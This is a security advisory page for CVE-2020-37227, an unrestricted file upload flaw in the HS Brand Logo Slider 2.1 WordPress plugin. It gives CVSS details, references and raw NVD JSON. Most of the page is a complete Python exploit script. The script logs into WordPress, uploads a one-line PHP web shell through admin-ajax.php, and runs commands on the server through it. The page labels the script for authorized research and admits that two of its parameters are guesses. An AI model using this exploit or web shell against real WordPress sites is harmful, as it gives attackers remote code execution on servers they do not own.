Security Vulnerability Report
CVE-2020-37227 CVSS 8.8 HIGH

CVE-2020-37227

Published: 2026-05-16 16:16:18
Last Modified: 2026-05-18 17:32:05

Description

HS Brand Logo Slider 2.1 contains an unrestricted file upload vulnerability (CWE-434): the plugin's admin-side upload form checks the file extension only in the browser, so an authenticated user can submit arbitrary files. An attacker intercepts the upload request to the logoupload parameter in the admin interface and renames the file to an executable extension such as .php; because the server performs no extension check of its own, the file is stored and can be executed, giving remote code execution.

CVSS Details

CVSS Score
8.8 (CVSS v3.1 base score; the record also carries a secondary CVSS v4.0 base score of 8.7)
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is published for this CVE (NVD status: Deferred); the affected product named in the description is listed below.

HS Brand Logo Slider 2.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that the AJAX action name and the upload path used in the script are placeholders not given by the advisory; confirm both against the plugin source before relying on the result.
python
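"""PoC for CVE-2020-37227 (CWE-434) in HS Brand Logo Slider 2.1.

Authenticates to WordPress, then posts a .php file to the plugin's
``logoupload`` parameter through admin-ajax.php. The plugin validates the
extension only in the browser, so sending the raw request outside a browser
skips that check entirely.

For security research and authorized testing only. Neither the AJAX action
name nor the final upload path is given by the advisory; both are guesses
and may need adjusting against the plugin source.
"""
import sys

import requests

# Target configuration -- every URL is derived from BASE_URL so the host is
# changed in exactly one place.
BASE_URL = 'http://example.com'
LOGIN_URL = f'{BASE_URL}/wp-login.php'
TARGET_URL = f'{BASE_URL}/wp-admin/admin-ajax.php'
# Guess: the standard WordPress media directory. Verify against the plugin.
SHELL_URL = f'{BASE_URL}/wp-content/uploads/shell.php'

# Credentials (PR:L -- any account the upload handler accepts)
USERNAME = 'attacker'
PASSWORD = 'password'

# Seconds before giving up on any single request; the original PoC had no
# timeout and would hang forever on an unresponsive host.
TIMEOUT = 15

# Example action name; the real hook name depends on the plugin source.
AJAX_ACTION = 'hs_logo_upload_action'

# Minimal web shell: runs the value of the ``cmd`` query parameter.
PHP_CODE = '<?php system($_GET["cmd"]); ?>'


def login(session: requests.Session) -> bool:
    """Log in with USERNAME/PASSWORD and report whether an auth cookie was set.

    On bad credentials wp-login.php normally re-renders the login form with
    HTTP 200, so the status code alone proves nothing; the presence of a
    ``wordpress_logged_in_*`` cookie in the jar is the reliable signal.
    """
    payload = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f'{BASE_URL}/wp-admin/',
    }
    session.post(LOGIN_URL, data=payload, timeout=TIMEOUT)
    return any(c.name.startswith('wordpress_logged_in_') for c in session.cookies)


def upload_shell(session: requests.Session) -> requests.Response:
    """Send the .php file to the logoupload parameter and return the response."""
    files = {
        # The only extension check is the client-side one, so the raw request
        # carries the .php name straight to the server.
        'logoupload': ('shell.php', PHP_CODE, 'application/octet-stream'),
    }
    data = {'action': AJAX_ACTION}
    return session.post(TARGET_URL, files=files, data=data, timeout=TIMEOUT)


def upload_looks_successful(response: requests.Response) -> bool:
    """Distinguish a real upload from admin-ajax.php's failure replies.

    admin-ajax.php commonly answers HTTP 200 even on failure: a body of '0'
    when no handler ran for the action and '-1' when a nonce/capability check
    failed. A bare status-code test therefore reports false positives.
    """
    body = response.text.strip()
    return response.status_code == 200 and body not in ('', '0', '-1')


def verify_shell(session: requests.Session) -> bool:
    """Request the uploaded file with a harmless command and show its output.

    Returns False when the guessed SHELL_URL does not answer 200, which
    usually means the plugin stores uploads somewhere else.
    """
    check = session.get(SHELL_URL, params={'cmd': 'whoami'}, timeout=TIMEOUT)
    if check.status_code != 200:
        print(f"Shell not reachable at {SHELL_URL} (HTTP {check.status_code}); "
              "the plugin may store uploads under a different path.")
        return False
    print(f"Shell responded at {SHELL_URL}:")
    print(check.text.strip())
    return True


def main() -> int:
    """Run login, upload and verification in order; return an exit code."""
    session = requests.Session()

    # 1. Authenticate to get cookies -- abort instead of uploading anonymously
    if not login(session):
        print("Login failed: no wordpress_logged_in cookie received.")
        return 1

    # 2./3. Prepare and send the malicious file
    response = upload_shell(session)
    if not upload_looks_successful(response):
        print(f"Upload failed (HTTP {response.status_code}): {response.text[:200]!r}")
        return 1
    print("File uploaded successfully.")

    # 4. Confirm code execution rather than assuming the upload location
    return 0 if verify_shell(session) else 1


if __name__ == '__main__':
    sys.exit(main())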

References

- https://ms.wordpress.org/plugins/hs-brand-logo-slider/
- https://www.exploit-db.com/exploits/48913
- https://www.heliossolutions.co/
- https://www.vulncheck.com/advisories/wordpress-plugin-hs-brand-logo-slider-unrestricted-file-upload

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-37227", "sourceIdentifier": "[email protected]", "published": "2026-05-16T16:16:17.713", "lastModified": "2026-05-18T17:32:04.823", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HS Brand Logo Slider 2.1 contains an unrestricted file upload vulnerability that allows authenticated users to bypass client-side file extension validation by uploading arbitrary files. Attackers can intercept upload requests to the logoupload parameter in the admin interface and rename files to executable extensions .php to achieve remote code execution."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://ms.wordpress.org/plugins/hs-brand-logo-slider/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/48913", "source": "[email protected]"}, {"url": "https://www.heliossolutions.co/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wordpress-plugin-hs-brand-logo-slider-unrestricted-file-upload", "source": "[email protected]"}]}}